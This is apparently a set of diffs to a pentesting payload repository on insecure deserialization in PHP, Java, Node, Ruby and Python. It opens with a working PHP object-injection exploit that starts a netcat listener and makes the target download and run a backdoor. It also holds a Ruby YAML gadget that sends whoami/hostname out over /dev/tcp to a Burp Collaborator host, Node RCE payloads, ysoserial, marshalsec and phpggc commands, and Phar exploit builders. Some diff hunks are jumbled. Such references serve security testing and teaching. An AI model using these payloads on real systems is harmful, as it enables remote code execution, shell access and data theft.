 A simple PoC to exploit PHP Object Injections flaws and gain remote shell access. 
 Shouts to @jstnkndy @yappare for the assist!
 NOTE: This requires http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz setup on a remote host with a connect back IP configured
 */
 print "==============================================================================\r\n";
 print "PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://crowdshield.com\r\n";
 print "==============================================================================\r\n";
 print "[+] Generating serialized payload...[OK]\r\n";
 print "[+] Launching reverse listener...[OK]\r\n";
 system('gnome-terminal -x sh -c \'nc -lvvp 4242\'');
 class PHPObjectInjection
 {
   // CHANGE URL/FILENAME TO MATCH YOUR SETUP
   public $inject = "system('wget http://127.0.0.1/backdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');";
 }
 $url = 'http://localhost/xvwa/vulnerabilities/php_object_injection/?r='; // CHANGE TO TARGET URL/PARAMETER
 $url = $url . urlencode(serialize(new PHPObjectInjection));
 print "[+] Sending exploit...[OK]\r\n";
 print "[+] Dropping down to interactive shell...[OK]\r\n";
 print "==============================================================================\r\n";
 $response = file_get_contents("$url");
 ?>
--- a/Deserialization/Files/node-serialize.js
+++ b/Deserialization/Files/node-serialize.js
@@ -0,0 +1,5 @@
 var y = {
    rce : function(){require('child_process').exec('ls /', function(error,stdout, stderr) { console.log(stdout) });},
 }
 var serialize = require('node-serialize');
 console.log("Serialized: \n" + serialize.serialize(y));
--- a/Deserialization/Files/ruby-serialize.yaml
+++ b/Deserialization/Files/ruby-serialize.yaml
@@ -0,0 +1,19 @@
 ---
 - !ruby/object:Gem::Installer
    i: x
 - !ruby/object:Gem::SpecFetcher
    i: y
 - !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: "bash -c 'echo 1 > /dev/tcp/`whoami`.`hostname`.wkkib01k9lsnq9qm2pogo10tmksagz.burpcollaborator.net/443'"
         method_id: :resolve
--- a/Deserialization/Images/NETNativeFormatters.png
+++ b/Deserialization/Images/NETNativeFormatters.png
--- a/Deserialization/Java.md
+++ b/Deserialization/Java.md
@@ -2,55 +2,67 @@
 ## Detection
- "AC ED 00 05" in Hex
+- `"AC ED 00 05"` in Hex
- "rO0" in Base64
+  * `AC ED`: STREAM_MAGIC. Specifies that this is a serialization protocol.
  * `00 05`: STREAM_VERSION. The serialization version.
 - `"rO0"` in Base64
 - Content-type = "application/x-java-serialized-object"
- "H4sIAAAAAAAAAJ" in gzip(base64)
+- `"H4sIAAAAAAAAAJ"` in gzip(base64)
-## Exploit
+## Tools
-[ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
+### Ysoserial
 [frohoff/ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
 ```java
 java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin
 java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
-java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar Groovy1 'ping 127.0.0.1' > payload.bin
+java -jar ysoserial.jar Groovy1 'ping 127.0.0.1' > payload.bin
 java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | base64
 ```
-payload | author | dependencies | impact (if not RCE)
+**List of payloads included in ysoserial:**
------|--------|------ |------
+```ps1
-BeanShell1          |@pwntester, @cschneider4711 |bsh:2.0b5
+Payload             Authors                                Dependencies                                                                                                                                                                                        
-C3P0                |@mbechler                   |c3p0:0.9.5.2, mchange-commons-java:0.2.11
+-------             -------                                ------------                                                                                                                                                                                        
-Clojure             |@JackOfMostTrades           |clojure:1.8.0
+AspectJWeaver       @Jang                                  aspectjweaver:1.9.2, commons-collections:3.2.2                                                                                                                                                      
-CommonsBeanutils1   |@frohoff                    |commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
+BeanShell1          @pwntester, @cschneider4711            bsh:2.0b5                                                                                                                                                                                           
-CommonsCollections1 |@frohoff                    |commons-collections:3.1
+C3P0                @mbechler                              c3p0:0.9.5.2, mchange-commons-java:0.2.11                                                                                                                                                           
-CommonsCollections2 |@frohoff                    |commons-collections4:4.0
+Click1              @artsploit                             click-nodeps:2.3.0, javax.servlet-api:3.1.0                                                                                                                                                         
-CommonsCollections3 |@frohoff                    |commons-collections:3.1
+Clojure             @JackOfMostTrades                      clojure:1.8.0                                                                                                                                                                                       
-CommonsCollections4 |@frohoff                    |commons-collections4:4.0
+CommonsBeanutils1   @frohoff                               commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2                                                                                                                               
-CommonsCollections5 |@matthias_kaiser, @jasinner |commons-collections:3.1
+CommonsCollections1 @frohoff                               commons-collections:3.1                                                                                                                                                                             
-CommonsCollections6 |@matthias_kaiser            |commons-collections:3.1
+CommonsCollections2 @frohoff                               commons-collections4:4.0                                                                                                                                                                            
-FileUpload1         |@mbechler                   |commons-fileupload:1.3.1, commons-io:2.4 | file uploading
+CommonsCollections3 @frohoff                               commons-collections:3.1                                                                                                                                                                             
-Groovy1             |@frohoff                    |groovy:2.3.9
+CommonsCollections4 @frohoff                               commons-collections4:4.0                                                                                                                                                                            
-Hibernate1          |@mbechler|
+CommonsCollections5 @matthias_kaiser, @jasinner            commons-collections:3.1                                                                                                                                                                             
-Hibernate2          |@mbechler|
+CommonsCollections6 @matthias_kaiser                       commons-collections:3.1                                                                                                                                                                             
-JBossInterceptors1  |@matthias_kaiser            |javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
+CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1                                                                                                                                                                             
-JRMPClient          |@mbechler|
+FileUpload1         @mbechler                              commons-fileupload:1.3.1, commons-io:2.4
-JRMPListener        |@mbechler|
+Groovy1             @frohoff                               groovy:2.3.9                                                                                                                                                                                        
-JSON1               |@mbechler                   |json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
+Hibernate1          @mbechler                                                                                                                                                                                                                                  
-JavassistWeld1      |@matthias_kaiser            |javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
+Hibernate2          @mbechler                                                                                                                                                                                                                                  
-Jdk7u21             |@frohoff|
+JBossInterceptors1  @matthias_kaiser                       javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21                                            
-Jython1             |@pwntester, @cschneider4711 |jython-standalone:2.5.2
+JRMPClient          @mbechler                                                                                                                                                                                                                                  
-MozillaRhino1       |@matthias_kaiser            |js:1.7R2
+JRMPListener        @mbechler                                                                                                                                                                                                                                  
-Myfaces1            |@mbechler|
+JSON1               @mbechler                              json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
-Myfaces2            |@mbechler|
+JavassistWeld1      @matthias_kaiser                       javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21                                                        
-ROME                |@mbechler                   |rome:1.0
+Jdk7u21             @frohoff                                                                                                                                                                                                                                   
-Spring1             |@frohoff                    |spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
+Jython1             @pwntester, @cschneider4711            jython-standalone:2.5.2                                                                                                                                                                             
-Spring2             |@mbechler                   |spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
+MozillaRhino1       @matthias_kaiser                       js:1.7R2                                                                                                                                                                                            
-URLDNS              |@gebl| | jre only vuln detect
+MozillaRhino2       @_tint0                                js:1.7R2                                                                                                                                                                                            
-Wicket1             |@jacob-baines               |wicket-util:6.23.0, slf4j-api:1.6.4
+Myfaces1            @mbechler                                                                                                                                                                                                                                  
 Myfaces2            @mbechler                                                                                                                                                                                                                                  
 ROME                @mbechler                              rome:1.0                                                                                                                                                                                            
 Spring1             @frohoff                               spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE                                                                                                                                               
 Spring2             @mbechler                              spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2                                                                                                           
 URLDNS              @gebl                                                                                                                                                                                                                                      
 Vaadin1             @kai_ullrich                           vaadin-server:7.7.14, vaadin-shared:7.7.14                                                                                                                                                          
 Wicket1             @jacob-baines                          wicket-util:6.23.0, slf4j-api:1.6.4   
 ```
-Additional tools (integration ysoserial with Burp Suite):
+### Burp extensions using ysoserial
 - [JavaSerialKiller](https://github.com/NetSPI/JavaSerialKiller)
 - [Java Deserialization Scanner](https://github.com/federicodotta/Java-Deserialization-Scanner)
@@ -58,15 +70,63 @@ Additional tools (integration ysoserial with Burp Suite):
 - [SuperSerial](https://github.com/DirectDefense/SuperSerial)
 - [SuperSerial-Active](https://github.com/DirectDefense/SuperSerial-Active)
-JRE8u20_RCE_Gadget
+### Alternative Tooling
-[https://github.com/pwntester/JRE8u20_RCE_Gadget](https://github.com/pwntester/JRE8u20_RCE_Gadget)
+
 - [pwntester/JRE8u20_RCE_Gadget](https://github.com/pwntester/JRE8u20_RCE_Gadget)
 - [joaomatosf/JexBoss](https://github.com/joaomatosf/jexboss) - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool
 - [pimps/ysoserial-modified](https://github.com/pimps/ysoserial-modified)
 - [NickstaDB/SerialBrute](https://github.com/NickstaDB/SerialBrute) - Java serialization brute force attack tool
 - [NickstaDB/SerializationDumper](https://github.com/NickstaDB/SerializationDumper) - A tool to dump Java serialization streams in a more human readable form
 - [bishopfox/gadgetprobe](https://labs.bishopfox.com/gadgetprobe)
 - [mbechler/marshalsec](https://github.com/mbechler/marshalsec) - Turning your data into code execution
 ```java
 $ java -cp marshalsec.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]]
 $ java -cp marshalsec.jar marshalsec.JsonIO Groovy "cmd" "/c" "calc"
 $ java -cp marshalsec.jar marshalsec.jndi.LDAPRefServer http://localhost:8000\#exploit.JNDIExploit 1389
 -a - generates/tests all payloads for that marshaller
 -t - runs in test mode, unmarshalling the generated payloads after generating them.
 -v - verbose mode, e.g. also shows the generated payload in test mode.
 gadget_type - Identifier of a specific gadget, if left out will display the available ones for that specific marshaller.
 arguments - Gadget specific arguments
 ```
 Payload generators for the following marshallers are included:<br />
 | Marshaller                      | Gadget Impact
 | ------------------------------- | ----------------------------------------------
 | BlazeDSAMF(0&#124;3&#124;X)     | JDK only escalation to Java serialization<br/>various third party libraries RCEs
 | Hessian&#124;Burlap             | various third party RCEs
 | Castor                          | dependency library RCE
 | Jackson                         | **possible JDK only RCE**, various third party RCEs
 | Java                            | yet another third party RCE
 | JsonIO                          | **JDK only RCE**
 | JYAML                           | **JDK only RCE**
 | Kryo                            | third party RCEs
 | KryoAltStrategy                 | **JDK only RCE**
 | Red5AMF(0&#124;3)               | **JDK only RCE**
 | SnakeYAML                       | **JDK only RCEs**
 | XStream                         | **JDK only RCEs**
 | YAMLBeans                       | third party RCE
 ## Gadgets
 Require:
 * `java.io.Serializable`
 JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool, [https://github.com/joaomatosf/jexboss](https://github.com/joaomatosf/jexboss)
 ## References
 - [Github - ysoserial](https://github.com/frohoff/ysoserial)
 - [Triggering a DNS lookup using Java Deserialization - paranoidsoftware.com](https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/)
 - [Detecting deserialization bugs with DNS exfiltration - Philippe Arteau | Mar 22, 2017](https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/)
 - [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
 - [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/)
 - [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a)
- [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - 14 Aug 2017, Peter Stöckli](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html)
+- [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - 14 Aug 2017, Peter Stöckli](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html)
 - [Jackson CVE-2019-12384: anatomy of a vulnerability class](https://blog.doyensec.com/2019/07/22/jackson-gadgets.html)
 - [On Jackson CVEs: Don’t Panic — Here is what you need to know](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062#da96)
 - [Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464) - Michael Stepankin / @artsploit - 29 June 2021](https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464)
--- a/Deserialization/Node.md
+++ b/Deserialization/Node.md
@@ -0,0 +1,49 @@
 # Node Deserialization
 ## Summary
 * [Exploit](#exploit)
    * [node-serialize](#node-serialize)
    * [funcster](#funcster)
 * [References](#references)
 ## Exploit
 * In Node source code, look for:
    * `node-serialize`
    * `serialize-to-js`
    * `funcster`
 ### node-serialize
 > An issue was discovered in the node-serialize package 0.0.4 for Node.js. Untrusted data passed into the `unserialize()` function can be exploited to achieve arbitrary code execution by passing a JavaScript Object with an Immediately Invoked Function Expression (IIFE).
 1. Generate a serialized payload
    ```js
    var y = {
        rce : function(){
            require('child_process').exec('ls /', function(error,
            stdout, stderr) { console.log(stdout) });
        },
    }
    var serialize = require('node-serialize');
    console.log("Serialized: \n" + serialize.serialize(y));
    ```
 2. Add bracket `()` to force the execution
    ```js
    {"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('ls /', function(error,stdout, stderr) { console.log(stdout) });}()"}
    ```
 3. Send the payload
 ### funcster
 ```js
 {"rce":{"__js_function":"function(){CMD=\"cmd /c calc\";const process = this.constructor.constructor('return this.process')();process.mainModule.require('child_process').exec(CMD,function(error,stdout,stderr){console.log(stdout)});}()"}}
 ```
 ## References
 * [Exploiting Node.js deserialization bug for Remote Code Execution (CVE-2017-5941) - Ajin Abraham](https://www.exploit-db.com/docs/english/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf)
 * [NodeJS Deserialization - 8 January 2020- gonczor](https://blacksheephacks.pl/nodejs-deserialization/)
 * [CVE-2017-5941 - NATIONAL VULNERABILITY DATABASE - 02/09/2017](https://nvd.nist.gov/vuln/detail/CVE-2017-5941)
--- a/Deserialization/PHP.md
+++ b/Deserialization/PHP.md
@@ -1,16 +1,28 @@
-# PHP Object injection
+# PHP Deserialization
 PHP Object Injection is an application level vulnerability that could allow an attacker to perform different kinds of malicious attacks, such as Code Injection, SQL Injection, Path Traversal and Application Denial of Service, depending on the context. The vulnerability occurs when user-supplied input is not properly sanitized before being passed to the unserialize() PHP function. Since PHP allows object serialization, attackers could pass ad-hoc serialized strings to a vulnerable unserialize() call, resulting in an arbitrary PHP object(s) injection into the application scope.
 The following magic methods will help you for a PHP Object injection
-* __wakeup() when an object is unserialized.
+* `__wakeup()` when an object is unserialized.
-* __destruct() when an object is deleted.
+* `__destruct()` when an object is deleted.
-* __toString() when an object is converted to a string.
+* `__toString()` when an object is converted to a string.
 Also you should check the `Wrapper Phar://` in [File Inclusion](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#wrapper-phar) which use a PHP object injection.
-## __wakeup in the unserialize function
+
 ## Summary
 * [General concept](#general-concept)
 * [Authentication bypass](#authentication-bypass)
 * [Object Injection](#object-injection)
 * [Finding and using gadgets](#finding-and-using-gadgets)
 * [Phar Deserialization](#phar-deserialization)
 * [Real world examples](#real-world-examples)
 * [References](#references)
 ## General concept
 Vulnerable code:
@@ -38,7 +50,7 @@ Vulnerable code:
 ?>
 ```
-Payload:
+Craft a payload using existing code inside the application.
 ```php
 # Basic serialized data
@@ -73,13 +85,13 @@ a:2:{s:8:"username";b:1;s:8:"password";b:1;}
 Because `true == "str"` is true.
-### Object reference
+## Object Injection
 Vulnerable code:
 ```php
 <?php
-class Object
+class ObjectExample
 {
  var $guess;
  var $secretCode;
@@ -99,40 +111,43 @@ if($obj) {
 Payload:
 ```php
-O:6:"Object":2:{s:10:"secretCode";N;s:4:"guess";R:2;}
+O:13:"ObjectExample":2:{s:10:"secretCode";N;s:5:"guess";R:2;}
 ```
-## Others exploits
+We can do an array like this:
 Reverse Shell
 ```php
-class PHPObjectInjection
+a:2:{s:10:"admin_hash";N;s:4:"hmac";R:2;}
 {
    // CHANGE URL/FILENAME TO MATCH YOUR SETUP
    public $inject = "system('wget http://URL/backdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');";
 }
 echo urlencode(serialize(new PHPObjectInjection));
 ```
 Basic detection
 ```php
 class PHPObjectInjection
 {
    // CHANGE URL/FILENAME TO MATCH YOUR SETUP
    public $inject = "system('cat /etc/passwd');";
 }
 echo urlencode(serialize(new PHPObjectInjection));
 //O%3A18%3A%22PHPObjectInjection%22%3A1%3A%7Bs%3A6%3A%22inject%22%3Bs%3A26%3A%22system%28%27cat+%2Fetc%2Fpasswd%27%29%3B%22%3B%7D
 //'O:18:"PHPObjectInjection":1:{s:6:"inject";s:26:"system(\'cat+/etc/passwd\');";}'
 ```
 ## Finding and using gadgets
-[PHPGGC](https://github.com/ambionics/phpggc) is a tool built to generate the payload based on several frameworks:
+Also called `"PHP POP Chains"`, they can be used to gain RCE on the system.
 * In PHP source code, look for `unserialize()` function.
 * Interesting [Magic Methods](https://www.php.net/manual/en/language.oop5.magic.php) such as `__construct()`, `__destruct()`, `__call()`, `__callStatic()`, `__get()`, `__set()`, `__isset()`, `__unset()`, `__sleep()`, `__wakeup()`, `__serialize()`, `__unserialize()`, `__toString()`, `__invoke()`, `__set_state()`, `__clone()`, and `__debugInfo()`:
    * `__construct()`: PHP allows developers to declare constructor methods for classes. Classes which have a constructor method call this method on each newly-created object, so it is suitable for any initialization that the object may need before it is used. [php.net](https://www.php.net/manual/en/language.oop5.decon.php#object.construct)
    * `__destruct()`: The destructor method will be called as soon as there are no other references to a particular object, or in any order during the shutdown sequence. [php.net](https://www.php.net/manual/en/language.oop5.decon.php#object.destruct)
    * `__call(string $name, array $arguments)`: The `$name` argument is the name of the method being called. The `$arguments` argument is an enumerated array containing the parameters passed to the `$name`'ed method. [php.net](https://www.php.net/manual/en/language.oop5.overloading.php#object.call)
    * `__callStatic(string $name, array $arguments)`: The `$name` argument is the name of the method being called. The `$arguments` argument is an enumerated array containing the parameters passed to the `$name`'ed method. [php.net](https://www.php.net/manual/en/language.oop5.overloading.php#object.callstatic)
    * `__get(string $name)`: `__get()` is utilized for reading data from inaccessible (protected or private) or non-existing properties. [php.net](https://www.php.net/manual/en/language.oop5.overloading.php#object.get)
    * `__set(string $name, mixed $value)`: `__set()` is run when writing data to inaccessible (protected or private) or non-existing properties. [php.net](https://www.php.net/manual/en/language.oop5.overloading.php#object.set)
    * `__isset(string $name)`: `__isset()` is triggered by calling `isset()` or `empty()` on inaccessible (protected or private) or non-existing properties. [php.net](https://www.php.net/manual/en/language.oop5.overloading.php#object.isset)
    * `__unset(string $name)`: `__unset()` is invoked when `unset()` is used on inaccessible (protected or private) or non-existing properties. [php.net](https://www.php.net/manual/en/language.oop5.overloading.php#object.unset)
    * `__sleep()`: `serialize()` checks if the class has a function with the magic name `__sleep()`. If so, that function is executed prior to any serialization. It can clean up the object and is supposed to return an array with the names of all variables of that object that should be serialized. If the method doesn't return anything then **null** is serialized and **E_NOTICE** is issued.[php.net](https://www.php.net/manual/en/language.oop5.magic.php#object.sleep)
    * `__wakeup()`: `unserialize()` checks for the presence of a function with the magic name `__wakeup()`. If present, this function can reconstruct any resources that the object may have. The intended use of `__wakeup()` is to reestablish any database connections that may have been lost during serialization and perform other reinitialization tasks. [php.net](https://www.php.net/manual/en/language.oop5.magic.php#object.wakeup)
    * `__serialize()`: `serialize()` checks if the class has a function with the magic name `__serialize()`. If so, that function is executed prior to any serialization. It must construct and return an associative array of key/value pairs that represent the serialized form of the object. If no array is returned a TypeError will be thrown. [php.net](https://www.php.net/manual/en/language.oop5.magic.php#object.serialize)
    * `__unserialize(array $data)`: this function will be passed the restored array that was returned from __serialize().  [php.net](https://www.php.net/manual/en/language.oop5.magic.php#object.unserialize)
    * `__toString()`: The __toString() method allows a class to decide how it will react when it is treated like a string [php.net](https://www.php.net/manual/en/language.oop5.magic.php#object.tostring)
    * `__invoke()`: The `__invoke()` method is called when a script tries to call an object as a function. [php.net](https://www.php.net/manual/en/language.oop5.magic.php#object.invoke)
    * `__set_state(array $properties)`: This static method is called for classes exported by `var_export()`. [php.net](https://www.php.net/manual/en/language.oop5.magic.php#object.set-state)
    * `__clone()`: Once the cloning is complete, if a `__clone()` method is defined, then the newly created object's `__clone()` method will be called, to allow any necessary properties that need to be changed. [php.net](https://www.php.net/manual/en/language.oop5.cloning.php#object.clone)
    * `__debugInfo()`: This method is called by `var_dump()` when dumping an object to get the properties that should be shown. If the method isn't defined on an object, then all public, protected and private properties will be shown. [php.net](https://www.php.net/manual/en/language.oop5.magic.php#object.debuginfo)
 [ambionics/phpggc](https://github.com/ambionics/phpggc) is a tool built to generate the payload based on several frameworks:
 - Laravel
 - Symfony
@@ -144,8 +159,81 @@ echo urlencode(serialize(new PHPObjectInjection));
 ```powershell
 phpggc monolog/rce1 'phpinfo();' -s
 phpggc monolog/rce1 assert 'phpinfo()'
 phpggc swiftmailer/fw1 /var/www/html/shell.php /tmp/data
 phpggc Monolog/RCE2 system 'id' -p phar -o /tmp/testinfo.ini
 ```
 ## Phar Deserialization
 Using `phar://` wrapper, one can trigger a deserialization on the specified file like in `file_get_contents("phar://./archives/app.phar")`.
 A valid PHAR includes four elements:
 1. **Stub**: The stub is a chunk of PHP code which is executed when the file is accessed in an executable context. At a minimum, the stub must contain `__HALT_COMPILER();` at its conclusion. Otherwise, there are no restrictions on the contents of a Phar stub.
 2. **Manifest**: Contains metadata about the archive and its contents.
 3. **File Contents**: Contains the actual files in the archive.
 4. **Signature**(optional): For verifying archive integrity.
 * Example of a Phar creation in order to exploit a custom `PDFGenerator`.
    ```php
    <?php
    class PDFGenerator { }
    //Create a new instance of the Dummy class and modify its property
    $dummy = new PDFGenerator();
    $dummy->callback = "passthru";
    $dummy->fileName = "uname -a > pwned"; //our payload
    // Delete any existing PHAR archive with that name
    @unlink("poc.phar");
    // Create a new archive
    $poc = new Phar("poc.phar");
    // Add all write operations to a buffer, without modifying the archive on disk
    $poc->startBuffering();
    // Set the stub
    $poc->setStub("<?php echo 'Here is the STUB!'; __HALT_COMPILER();");
    /* Add a new file in the archive with "text" as its content*/
    $poc["file"] = "text";
    // Add the dummy object to the metadata. This will be serialized
    $poc->setMetadata($dummy);
    // Stop buffering and write changes to disk
    $poc->stopBuffering();
    ?>
    ```
 * Example of a Phar creation with a `JPEG` magic byte header since there is no restriction on the content of stub.
    ```php
    <?php
    class AnyClass {
        public $data = null;
        public function __construct($data) {
            $this->data = $data;
        }
        function __destruct() {
            system($this->data);
        }
    }
    // create new Phar
    $phar = new Phar('test.phar');
    $phar->startBuffering();
    $phar->addFromString('test.txt', 'text');
    $phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");
    // add object of any class as meta data
    $object = new AnyClass('whoami');
    $phar->setMetadata($object);
    $phar->stopBuffering();
    ```
 ## Real world examples
 * [Vanilla Forums ImportController index file_exists Unserialize Remote Code Execution Vulnerability - Steven Seeley](https://hackerone.com/reports/410237)
@@ -153,13 +241,23 @@ phpggc monolog/rce1 'phpinfo();' -s
 * [Vanilla Forums domGetImages getimagesize Unserialize Remote Code Execution Vulnerability (critical) - Steven Seeley](https://hackerone.com/reports/410882)
 * [Vanilla Forums Gdn_Format unserialize() Remote Code Execution Vulnerability - Steven Seeley](https://hackerone.com/reports/407552)
 ## References
 * [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection)
-* [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/)
+* [Utilizing Code Reuse/ROP in PHP](https://owasp.org/www-pdf-archive/Utilizing-Code-Reuse-Or-Return-Oriented-Programming-In-PHP-Application-Exploits.pdf)
 * [PHP unserialize](http://php.net/manual/en/function.unserialize.php)
 * [PHP Generic Gadget - ambionics security](https://www.ambionics.io/blog/php-generic-gadget-chains)
 * [POC2009 Shocking News in PHP Exploitation](https://www.owasp.org/images/f/f6/POC2009-ShockingNewsInPHPExploitation.pdf)
 * [PHP Internals Book - Serialization](http://www.phpinternalsbook.com/classes_objects/serialization.html)
-* [TSULOTT Web challenge write-up from MeePwn CTF 1st 2017 by Rawsec](https://rawsec.ml/en/MeePwn-2017-write-ups/#tsulott-web)
+* [TSULOTT Web challenge write-up from MeePwn CTF 1st 2017 by Rawsec](https://blog.raw.pm/en/meepwn-2017-write-ups/#TSULOTT-Web)
 * [CTF writeup: PHP object injection in kaspersky CTF](https://medium.com/@jaimin_gohel/ctf-writeup-php-object-injection-in-kaspersky-ctf-28a68805610d)
 * [Jack The Ripper Web challeneg Write-up from ECSC 2019 Quals Team France by Rawsec](https://blog.raw.pm/en/ecsc-2019-quals-write-ups/#164-Jack-The-Ripper-Web)
 * [Rusty Joomla RCE Unserialize overflow - Alessandro Groppo - October 3, 2019](https://blog.hacktivesecurity.com/index.php/2019/10/03/rusty-joomla-rce/)
 * [PHP Pop Chains - Achieving RCE with POP chain exploits. - Vickie Li - September 3, 2020](https://vkili.github.io/blog/insecure%20deserialization/pop-chains/)
 * [How to exploit the PHAR Deserialization Vulnerability - Alexandru Postolache - May 29, 2020](https://pentest-tools.com/blog/exploit-phar-deserialization-vulnerability/)
 * [phar:// deserialization - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-inclusion/phar-deserialization)
 * [Finding PHP Serialization Gadget Chain - DG'hAck Unserial killer - Aug 11, 2022 - xanhacks](https://www.xanhacks.xyz/p/php-gadget-chain/#introduction)
 * [FINDING A POP CHAIN ON A COMMON SYMFONY BUNDLE: PART 1 - Rémi Matasse - 12/09/2023](https://www.synacktiv.com/publications/finding-a-pop-chain-on-a-common-symfony-bundle-part-1)
 * [FINDING A POP CHAIN ON A COMMON SYMFONY BUNDLE: PART 2 - Rémi Matasse - 11/10/2023](https://www.synacktiv.com/publications/finding-a-pop-chain-on-a-common-symfony-bundle-part-2)
 * [PHP deserialization attacks and a new gadget chain in Laravel - Mathieu Farrell - Tue 13 February 2024](https://blog.quarkslab.com/php-deserialization-attacks-and-a-new-gadget-chain-in-laravel.html)
--- a/Deserialization/Python.md
+++ b/Deserialization/Python.md
@@ -1,8 +1,15 @@
 # Python Deserialization
 * In Python source code, look for:
    * `cPickle.loads`
    * `pickle.loads`
    * `_pickle.loads`
    * `jsonpickle.decode`
 ## Pickle
 The following code is a simple example of using `cPickle` in order to generate an auth_token which is a serialized User object.
 :warning: `import cPickle` will only work on Python 2
 ```python
 import cPickle
@@ -32,7 +39,7 @@ Python 2.7 documentation clearly states Pickle should never be used with untrust
 > The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.
 ```python
-import cPickle
+import cPickle, os
 from base64 import b64encode, b64decode
 class Evil(object):
@@ -47,4 +54,4 @@ print("Your Evil Token : {}").format(evil_token)
 ## References
 * [Exploiting misuse of Python's "pickle" - Mar 20, 2011](https://blog.nelhage.com/2011/03/exploiting-pickle/)
-* [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/)
+* [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/)
--- a/Deserialization/README.md
+++ b/Deserialization/README.md
@@ -8,10 +8,35 @@ Check the following sub-sections, located in other files :
 * [PHP (Object injection) : phpggc, ...](PHP.md)
 * [Ruby : universal rce gadget, ...](Ruby.md)
 * [Python : pickle, ...](Python.md)
 * [YAML : PyYAML, ...](YAML.md)
 * [.NET : ysoserial.net, ...](DotNET.md)
 | Object Type     | Header (Hex) | Header (Base64) |
 |-----------------|--------------|-----------------|
 | Java Serialized | AC ED        | rO              |
 | .NET ViewState  | FF 01        | /w              |
 | Python Pickle   | 80 04 95     | gASV            |
 | PHP Serialized  | 4F 3A        | Tz              |
 ## POP Gadgets
 > A POP (Property Oriented Programming) gadget is a piece of code implemented by an application's class, that can be called during the deserialization process.
 POP gadgets characteristics:
 * Can be serialized
 * Has public/accessible properties
 * Implements specific vulnerable methods
 * Has access to other "callable" classes
 ## Labs
